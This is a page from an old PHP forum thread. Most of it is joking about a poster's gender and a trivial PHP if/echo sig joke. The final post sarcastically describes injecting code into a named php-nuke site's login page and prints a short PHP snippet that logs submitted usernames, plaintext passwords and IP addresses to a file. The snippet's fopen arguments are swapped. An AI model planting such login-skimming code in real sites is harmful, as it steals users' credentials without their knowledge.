Page 3 of 3

Posted: Thu Sep 11, 2003 3:48 am
by Nay
twigletmac wrote:
Nay wrote:does my name sound like a girls'?.......
Everybody tends to assume I'm a guy, you can never get these things right on the internet can you :lol: .

Mac
*agrees*

This is not my first time lol

-Nay

ps: maybe my signature now might make a difference :-D

Posted: Thu Sep 11, 2003 4:02 am
by JayBird
maybe your sig should be

Code: Select all

if ($nay == "Female") {
   echo "I'm a guy, not a girl!!";
}
:lol: :lol: :lol:

Posted: Thu Sep 11, 2003 7:50 am
by Nay
haha, nope.

I should request to php.net or something - to have a function in PHP5.

Call it, nayInfo(), which prints out my profile. Whoo!

lol

-Nay

Posted: Thu Sep 11, 2003 8:24 am
by jmarcv
Nay wrote:
Okay, I think I see where you're going.

-Nay
Maybe not <g>
His site is at http://www.vibe-tech.co.uk

and is a php-nuke site. Apparently he doesn't have the ability to go to the login section of modules.php and inject some code such as:

Code: Select all

<?php
$tr = fopen($file, "login.log");
if (isset($tr)){
	fputs ($tr,date('Y-m-d').':'.$_POST['username'].':'.$_POST['user_password'].':'.$_SERVER['REMOTE_ADDR']."\n");
	fclose($tr);
}
?>
... because he doesn't have a clue how to ask for what he wants, or what to do with it when he gets the answer.